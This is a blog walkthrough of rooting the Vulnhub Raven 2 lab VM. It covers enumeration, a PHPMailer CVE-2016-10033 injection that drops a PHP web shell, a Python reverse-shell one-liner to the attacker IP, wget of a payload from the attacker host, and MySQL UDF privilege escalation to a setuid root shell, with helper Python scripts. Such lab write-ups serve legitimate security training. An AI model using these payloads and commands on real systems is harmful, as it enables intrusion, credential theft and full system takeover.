Raven 2 from Vulnhub complete walkthrough

Aloha!
In this post I'll describe a complete walkthrough for the Raven 2 box (available at https://www.vulnhub.com/entry/raven-2,269/).
The initial setup is as follows: the target raven2.local (referred to as raven.local in the commands below) has IP 192.168.56.4, my Kali VirtualBox VM is at 192.168.56.3, and the host box is at 192.168.56.1.

Let's do some recon with nmap:

root@kali:~/vulnhub/raven# nmap -sS -sV  raven.local  
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-16 22:39 EET
Nmap scan report for raven.local (192.168.56.4)
Host is up (0.000037s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
MAC Address: 08:00:27:26:B2:37 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds


Service detection suggests that OpenSSH 6.7p1 is affected by CVE-2018-15473, a username enumeration bug; Exploit-DB has a script for it (exploits/linux/remote/45233.py via searchsploit). That only yields valid usernames, though, and bruteforcing of any kind is not a good idea at this point, so let's dig deeper.
The next service is RPC on port 111. Let's take a closer look:

root@kali:~/vulnhub/raven# nmap -sS -sV --script rpcinfo raven.local -p 111  
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-17 16:43 EET
Nmap scan report for raven.local (192.168.56.4)
Host is up (0.00020s latency).

PORT    STATE SERVICE VERSION
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:  
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          45718/tcp  status
|_  100024  1          50675/udp  status
MAC Address: 08:00:27:26:B2:37 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds



All of my attempts to interact with these services failed (rpcbind and status alone give nothing to work with), so I moved on to Apache 2.4.10 on port 80.
A little browsing showed that the backend application is implemented in PHP. Nice. Let's do some enumeration:

Looking for dirs:


root@kali:~/vulnhub/raven# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt raven.local/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://raven.local/FUZZ
Total requests: 20469

==================================================================
ID      Response   Lines      Word         Chars          Payload     
==================================================================

000015:  C=403     11 L       32 W          295 Ch        ".htaccess"
000016:  C=403     11 L       32 W          295 Ch        ".htpasswd"
005517:  C=301      9 L       28 W          308 Ch        "css"
007795:  C=301      9 L       28 W          310 Ch        "fonts"
009464:  C=301      9 L       28 W          308 Ch        "img"
010190:  C=301      9 L       28 W          307 Ch        "js"
011356:  C=301      9 L       28 W          311 Ch        "manual"
016215:  C=403     11 L       32 W          299 Ch        "server-status"
019078:  C=301      9 L       28 W          311 Ch        "vendor"
019909:  C=301      9 L       28 W          314 Ch        "wordpress"

Total time: 19.17196
Processed Requests: 20469
Filtered Requests: 20459
Requests/sec.: 1067.652



The interesting folders are vendor and wordpress. A little browsing of /vendor showed that PHPMailer is installed there and that the web app probably uses it in some way.
Taking a quick look at the files accessible through the browser, I noticed two important things:
1. http://raven.local/vendor/VERSION discloses the PHPMailer version, which appears to be 5.2.16 (the X-Mailer header in the exploit output later in this post says 5.2.17; both are below 5.2.18, the first release with a fix, and that fix was itself bypassed until 5.2.20, CVE-2016-10045). According to Metasploit, it is vulnerable to RCE (CVE-2016-10033). At this point the PHPMailer library was not much help, though, because I still had no idea how the web app uses it.
2. http://raven.local/vendor/PATH contains the absolute path /var/www/html/vendor/ and flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}. Yeah, baby.

Well, now we have something. Let’s do some more enumeration. Next run of wfuzz looked for PHP scripts available:

root@kali:~/vulnhub/raven# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt raven.local/FUZZ.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://raven.local/FUZZ.php
Total requests: 20469

==================================================================
ID      Response   Lines      Word         Chars          Payload     
==================================================================

005172:  C=200    224 L      677 W         9699 Ch        "contact"
000015:  C=403     11 L       32 W          299 Ch        ".htaccess"
000016:  C=403     11 L       32 W          299 Ch        ".htpasswd"

Total time: 19.22307
Processed Requests: 20469
Filtered Requests: 20466
Requests/sec.: 1064.814

A quick look at contact.php with the Firefox devtools showed that the form submits the name, message, action and email parameters to mail.php. Unfortunately, requesting mail.php returned a 404. Embarrassing…

I tried harder. ZIP time, wfuzz:

root@kali:~/vulnhub/raven# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt raven.local/FUZZ.zip

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://raven.local/FUZZ.zip
Total requests: 20469

==================================================================
ID      Response   Lines      Word         Chars          Payload     
==================================================================

000015:  C=403     11 L       32 W          299 Ch        ".htaccess"
000016:  C=403     11 L       32 W          299 Ch        ".htpasswd"
005172:  C=200     18 L      103 W         3384 Ch        "contact"

Total time: 17.71362
Processed Requests: 20469
Filtered Requests: 20466
Requests/sec.: 1155.551

The webmaster was kind enough to leave some sources in contact.zip. Below is a quick excerpt showing how the web app drives the vulnerable PHPMailer:

<?php
// Excerpt from contact.zip, left as found on the box. The attacker-controlled
// $email goes into setFrom(), which also sets $mail->Sender; PHPMailer hands
// Sender to sendmail as "-f<sender>" through PHP's mail(), and that argument
// is the injection point of CVE-2016-10033.
if (isset($_REQUEST['action'])){
        $name=$_REQUEST['name'];
        $email=$_REQUEST['email'];       // injection point: becomes the -f sendmail parameter
        $message=$_REQUEST['message'];   // message body: this is where the exploit puts its PHP code
        if (($name=="")||($email=="")||($message=="")){
                echo "There are missing fields.";
        }else{
                require 'vulnerable/PHPMailerAutoload.php';
                $mail = new PHPMailer;
                $mail->Host = "localhost";
                $mail->setFrom($email, 'Vulnerable Server');   // validateAddress() accepts a quoted local-part containing spaces and \"
                $mail->addAddress('admin@vulnerable.com', 'Hacker');
                $mail->Subject  = "Message from $name";
                $mail->Body     = $message;
                if(!$mail->send()) {                            // default transport is mail(), i.e. a local sendmail run through /bin/sh
                        echo 'Message was not sent.';
                        echo 'Mailer error: ' . $mail->ErrorInfo;
                } else {
                        echo 'Message has been sent.';
                }
        }
}
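To make the injection concrete, here is an added Python model (my code, not part of the original post or of PHPMailer) of the two transformations the $email value goes through on its way to sendmail: PHP's escapeshellcmd(), which mail() applies to the -f<sender> parameter, and the word splitting /bin/sh then performs on the resulting command line. The PAYLOAD constant is the sender the exploit injects (it is the From: value that shows up in the sendmail transcript later in this post); is_shell_safe() is my emulation of the allowlist check PHPMailer added in 5.2.20, included so the same payload can be seen rejected. Function names are mine.

```python
import shlex

# Sender address injected by the exploit used on this box (same value as the From:
# header in the sendmail transcript later in this post). The quoted local-part is
# RFC-legal, so PHPMailer's validateAddress() lets it through to setFrom().
PAYLOAD = '"attacker\\" -oQ/tmp/ -X/var/www/html/vendor/phpcode3.php  some"@email.com'


def php_escapeshellcmd(s):
    """Emulation of PHP's escapeshellcmd(), which mail() applies to its 5th argument.

    Metacharacters get a backslash; a quote is left alone if a matching quote follows
    it (PHP pairs them up), otherwise it is escaped. Spaces are never touched, which is
    what lets one "address" turn into several sendmail arguments.
    """
    special = set('#&;`|*?~<>^()[]{}$\\\n\xff')
    out = []
    partner = None  # index of the closing quote paired with the current opening one
    for i, ch in enumerate(s):
        if ch in special:
            out.append('\\' + ch)
        elif ch in '"\'':
            if partner is None and s.find(ch, i + 1) != -1:
                partner = s.find(ch, i + 1)   # opening quote with a partner: kept as-is
                out.append(ch)
            elif partner == i:
                partner = None                # the partner itself: kept as-is
                out.append(ch)
            else:
                out.append('\\' + ch)         # unpaired quote: escaped
        else:
            out.append(ch)
    return ''.join(out)


def sendmail_argv(sender, sendmail_path='/usr/sbin/sendmail -t -i'):
    """argv that /bin/sh hands to sendmail for PHPMailer's mail() transport.

    PHPMailer builds '-f' . $this->Sender; PHP's mail() appends escapeshellcmd()
    of that to sendmail_path and runs the line through the shell, whose word
    splitting is modelled here with shlex in POSIX mode.
    """
    cmdline = sendmail_path + ' ' + php_escapeshellcmd('-f' + sender)
    return shlex.split(cmdline)


def is_shell_safe(s):
    """Allowlist in the spirit of the isShellSafe() check PHPMailer added in 5.2.20:
    a value passed to -f may contain only ASCII alphanumerics and @ _ - . and must
    survive escapeshellcmd() unchanged. Anything else is simply not passed to -f."""
    return (php_escapeshellcmd(s) == s
            and all(c.isascii() and (c.isalnum() or c in '@_-.') for c in s))


if __name__ == '__main__':
    for arg in sendmail_argv(PAYLOAD):
        print(repr(arg))
    print('payload accepted by the allowlist:', is_shell_safe(PAYLOAD))
```

The split shows why the attack works: the escaped backslash becomes a literal backslash inside the double quotes, the next quote closes the word, and -oQ/tmp/ and -X/var/www/html/vendor/phpcode3.php become separate sendmail options. -X asks sendmail to write a transcript of the session, message body included, to that path, which is how the PHP code in $message lands in a file under the web root; -oQ/tmp/ just points the queue directory somewhere sendmail can write so it does not bail out first.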

Exploit time! To be honest, I had a hard time modifying anarcoder's exploit for PHPMailer (exploits/php/webapps/40974.py). I attached my version to the post, so enjoy.
In the end I dropped my simple PHP shell into the /vendor folder like this (the -X transcript trick needs a directory the mail-sending user can write to; as the listing below shows, /var/www/html/vendor is world-writable):

root@kali:~/vulnhub/raven# python phpmailer.py  
PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com
Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski

[+] SeNdiNG eVIl SHeLL To TaRGeT....
[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D

Browsing to http://raven.local/vendor/phpcode3.php?cmd=id;%20whoami;%20ls%20-la; showed some l00t. The dropped file is really the sendmail -X transcript, so the response starts with the logged SMTP conversation and headers (note the injected sender in the From: header) before the command output:


-------------skip----------------
02835 >>> some"@email.com... Unbalanced '"'
02835 <<< To: Hacker <admin@vulnerable.com>
02835 <<< Subject: Message from admin
02835 <<< X-PHP-Originating-Script: 0:class.phpmailer.php
02835 <<< Date: Wed, 16 Jan 2019 09:33:09 +1100
02835 <<< From: Vulnerable Server <"attacker\" -oQ/tmp/ -X/var/www/html/vendor/phpcode3.php  some"@email.com>
02835 <<< Message-ID: <82d20106c705f7a4293fe1867f0cb76f@raven.local>
02835 <<< X-Mailer: PHPMailer 5.2.17 (https://github.com/PHPMailer/PHPMailer)
02835 <<< MIME-Version: 1.0
02835 <<< Content-Type: text/plain; charset=iso-8859-1
02835 <<<  
02835 <<< uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
total 652
drwxrwxrwx  7 root     root       4096 Jan 16 09:33 .
drwxrwxrwx 10 root     root       4096 Aug 13 17:28 ..
-rwxrwxrwx  1 root     root        287 Aug 13 07:56 .gitattributes
-rwxrwxrwx  1 root     root         79 Aug 13 07:56 .gitignore
-rwxrwxrwx  1 root     root       3627 Aug 13 07:56 .scrutinizer.yml
-rwxrwxrwx  1 root     root        884 Aug 13 07:56 .travis.yml
-rwxrwxrwx  1 root     root      26421 Aug 13 07:56 LICENSE
-rw-r--r--  1 root     root         62 Nov  9 08:17 PATH
-rwxrwxrwx  1 root     root       1689 Aug 13 07:56 PHPMailerAutoload.php
-rwxrwxrwx  1 root     root      13334 Aug 13 07:56 README.md
-rwxrwxrwx  1 root     root       2329 Aug 13 07:56 SECURITY.md
-rwxrwxrwx  1 root     root          6 Aug 13 07:56 VERSION
-rwxrwxrwx  1 root     root      28961 Aug 13 07:56 changelog.md
-rwxrwxrwx  1 root     root     144358 Aug 13 07:56 class.phpmailer.php
-rwxrwxrwx  1 root     root       7216 Aug 13 07:56 class.phpmaileroauth.php
-rwxrwxrwx  1 root     root       2464 Aug 13 07:56 class.phpmaileroauthgoogle.php
-rwxrwxrwx  1 root     root      11006 Aug 13 07:56 class.pop3.php
-rwxrwxrwx  1 root     root      42054 Aug 13 07:56 class.smtp.php
-rwxrwxrwx  1 root     root       1163 Aug 13 07:56 composer.json
-rwxrwxrwx  1 root     root     129288 Aug 13 07:56 composer.lock
drwxrwxrwx  2 root     root       4096 Aug 13 07:56 docs
drwxrwxrwx  5 root     root       4096 Aug 13 07:56 examples
drwxrwxrwx  2 root     root       4096 Aug 13 07:56 extras
-rwxrwxrwx  1 root     root       5036 Aug 13 07:56 get_oauth_token.php
drwxrwxrwx  2 root     root       4096 Aug 13 07:56 language
-rw-r--r--  1 www-data www-data  15557 Jan 16 09:33 phpcode3.php
drwxrwxrwx  2 root     root       4096 Aug 13 07:56 test
-rwxrwxrwx  1 root     root       1074 Aug 13 07:56 travis.phpunit.xml.dist
-------------skip----------------



Great. Gimme something more…

Output from http://raven.local/vendor/phpcode3.php?cmd=find%20/var/www/%20-type%20f disclosed two flags and wp-config.php

------------skip-----------------
/var/www/html/wordpress/wp-config.php
------------skip-----------------
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
------------skip-----------------
/var/www/flag2.txt
------------skip-----------------

Let’s grab MySQL credentials…

http://raven.local/vendor/phpcode3.php?cmd=cat /var/www/html/wordpress/wp-config.php | grep DB

------------skip-----------------
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'R@v3nSecurity');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8mb4');
define('DB_COLLATE', '');
------------skip-----------------

…and, surprisingly, I found out that MySQL runs as root!
http://raven.local/vendor/phpcode3.php?cmd=ps aux | grep mysql

------------skip-----------------
root       521  0.0  0.3   4340  1624 ?        S    03:44   0:00 /bin/sh /usr/bin/mysqld_safe
root       885  0.1 10.1 552020 51608 ?        Sl   03:44   0:22 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log
/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
www-data  3061  0.0  0.1   4340   812 ?        S    09:48   0:00 sh -c ps aux | grep mysql
www-data  3063  0.0  0.1  11132   964 ?        S    09:48   0:00 grep mysql
------------skip-----------------


Such a setup is pretty weird (Debian's packaging runs mysqld as the mysql user by default), but it opens a root door for me.
Time to set up a reverse shell. I prefer the Python one-liner:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


So if I start a listener on my Kali box

root@kali:~/vulnhub/raven# nc -l -p 4444 -vv
Listening on [unknown] (family 0, port -739699315)


and request

http://raven.local/vendor/phpcode3.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



reverse shell will pop up in nc session.

The idea behind the privilege escalation is that the combination of MySQL root credentials and a MySQL server running as root allows a MySQL UDF command-execution attack (brief description: http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html). Whatever sys_exec() runs inherits the privileges of the mysqld process, which here means root.

So let's begin.
1. I grabbed lib_mysqludf_sys on my Kali box:
git clone https://github.com/mysqludf/lib_mysqludf_sys
2. Since Raven 2 is an x64 box, I compiled it accordingly.
3. Finally, I moved the resulting library, lib_mysqludf_sys2.so, to raven's /tmp folder.
One thing to keep in mind: MySQL resolves the SONAME in CREATE FUNCTION only inside plugin_dir (/usr/lib/mysql/plugin according to the mysqld command line above), so the library has to end up in that directory, not just in /tmp. With mysqld running as root, writing it there from the MySQL shell with load_file() into a dumpfile works.

At this point, everything is ready to inject my evil plugin into MySQL.

First upgrade the dumb shell to a tty and spawn /bin/bash:

root@kali:~/vulnhub/raven# nc -l -p 4444 -vv
Listening on [unknown] (family 0, port 692340109)
Connection from raven.local 34332 received!
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash");'
www-data@Raven:/var/www/html/vendor$  

Get into MySQL shell using creds from WordPress:

www-data@Raven:/var/www/html/vendor$ mysql -u root -p'R@v3nSecurity' mysql
mysql -u root -p'R@v3nSecurity' mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>  

and then do a little magic:

mysql> CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.01 sec)

mysql> CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys2.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys2.so';
Query OK, 0 rows affected (0.00 sec)

just to check:

mysql> select sys_eval('id');
select sys_eval('id');
+-----------------------------------------+
| sys_eval('id')                          |
+-----------------------------------------+
| uid=0(root) gid=0(root) groups=0(root)  |
+-----------------------------------------+

w00tw00t.

Final headshot:

mysql> \! wget 192.168.56.3/rootshell.c -O /tmp/rootshell.c
mysql> \! gcc /tmp/rootshell.c -o /tmp/rootshell
mysql> select sys_eval('chmod +x /tmp/rootshell;   chown root:root /tmp/rootshell; chmod +s /tmp/rootshell; ');

where rootshell.c is a simple setuid bash wrapper. Note that \! runs the command through the mysql client, i.e. as www-data; only the chown and chmod need root, which is why they go through sys_eval():


#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>

/* Once the binary is root-owned with the setuid bit set (done through sys_eval(),
 * i.e. as root), setuid(0)/setgid(0) make the real ids 0 as well, so bash does
 * not drop the privileges the way it would for euid != uid. */
int main(void)
{
        setuid(0); setgid(0); system("/bin/bash");
        return 0;
}
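The whole escalation chain hinges on two facts pulled out of the web shell output (mysqld runs as root, and wp-config.php hands over the MySQL root password) plus one step the session above does not show: the library must sit inside plugin_dir before CREATE FUNCTION ... SONAME can see it. The Python below is an added example (mine, not from the original post or from lib_mysqludf_sys) that parses the ps aux and wp-config.php evidence gathered earlier, checks those preconditions and emits the SQL to run, including the load_file() into dumpfile copy into plugin_dir. The two sample strings are copied from the output above (the wrapped mysqld command line re-joined onto one line); function names and the plan structure are mine.

```python
import re
import shlex

# Constructed samples, copied from the output gathered through the web shell
# earlier in this post; the mysqld command line is re-joined onto one line.
PS_AUX_SAMPLE = """\
root       521  0.0  0.3   4340  1624 ?        S    03:44   0:00 /bin/sh /usr/bin/mysqld_safe
root       885  0.1 10.1 552020 51608 ?        Sl   03:44   0:22 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
www-data  3061  0.0  0.1   4340   812 ?        S    09:48   0:00 sh -c ps aux | grep mysql
"""

WP_CONFIG_SAMPLE = """\
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'R@v3nSecurity');
define('DB_HOST', 'localhost');
"""


def mysqld_facts(ps_output):
    """Locate the mysqld process in `ps aux` output and report the account it runs
    as and the plugin_dir it was started with (the only place SONAME is resolved)."""
    for line in ps_output.splitlines():
        fields = line.split(None, 10)          # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(fields) < 11:
            continue
        argv = shlex.split(fields[10])
        if not argv or not argv[0].endswith('/mysqld'):
            continue                           # skips mysqld_safe and our own grep
        opts = dict(a[2:].split('=', 1) for a in argv[1:] if a.startswith('--') and '=' in a)
        return {
            'ps_user': fields[0],                                          # what the kernel says
            'mysqld_user': opts.get('user', fields[0]),                    # what --user asked for
            'plugin_dir': opts.get('plugin-dir', '/usr/lib/mysql/plugin'), # Debian's default
        }
    return None


def wp_db_credentials(wp_config):
    """Extract the DB_* constants from wp-config.php define() calls."""
    pattern = re.compile(r"define\(\s*'(DB_\w+)'\s*,\s*'([^']*)'\s*\)")
    return dict(pattern.findall(wp_config))


def udf_privesc_plan(ps_output, wp_config, so_path='/tmp/lib_mysqludf_sys2.so'):
    """Check the preconditions of the UDF route (mysqld runs as root, and we hold a DB
    account to log in with) and return the statements to run in the mysql shell.

    The first statement copies the library into plugin_dir from inside MySQL: since
    5.0.67, CREATE FUNCTION ... SONAME looks only there, and with mysqld running as
    root the dumpfile write into /usr/lib/mysql/plugin succeeds. Both load_file()
    and INTO DUMPFILE need the FILE privilege, which the MySQL root account has.
    """
    facts = mysqld_facts(ps_output)
    creds = wp_db_credentials(wp_config)
    plan = {'mysqld': facts, 'db_user': creds.get('DB_USER'), 'blockers': [], 'sql': []}
    if facts is None:
        plan['blockers'].append('no mysqld process in ps output')
    elif facts['ps_user'] != 'root':
        plan['blockers'].append(f"mysqld runs as {facts['ps_user']}: sys_exec() would not give root")
    if 'DB_USER' not in creds or 'DB_PASSWORD' not in creds:
        plan['blockers'].append('no DB credentials recovered from wp-config.php')
    if plan['blockers']:
        return plan
    so_name = so_path.rsplit('/', 1)[-1]
    dest = facts['plugin_dir'].rstrip('/') + '/' + so_name
    plan['sql'] = [
        f"SELECT load_file('{so_path}') INTO DUMPFILE '{dest}';",
        f"CREATE FUNCTION sys_exec RETURNS int SONAME '{so_name}';",
        f"CREATE FUNCTION sys_eval RETURNS string SONAME '{so_name}';",
        "SELECT sys_eval('id');",
    ]
    return plan


if __name__ == '__main__':
    result = udf_privesc_plan(PS_AUX_SAMPLE, WP_CONFIG_SAMPLE)
    print(result['mysqld'], result['db_user'], result['blockers'])
    print('\n'.join(result['sql']))
```

Only sys_exec() and sys_eval() are needed for the attack; the other functions created in the session above are optional. If ps_user is not root the plan refuses: sys_exec() runs with the privileges of the mysqld process, so on a default Debian install (mysqld as the mysql user) this route yields a shell as mysql, not root.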




last flag resides in /root folder:

root@Raven:/tmp# cat /root/flag4.txt
cat /root/flag4.txt
 ___                   ___ ___  
| _ \__ ___ _____ _ _ |_ _|_ _|
|   / _` \ V / -_) ' \ | | | |  
|_|_\__,_|\_/\___|_||_|___|___|
                           
flag4{df2bc5e951d91581467bb9a2a8ff4425}

CONGRATULATIONS on successfully rooting RavenII

I hope you enjoyed this second interation of the Raven VM

Hit me up on Twitter and let me know what you thought:  

@mccannwj / wjmccann.github.io
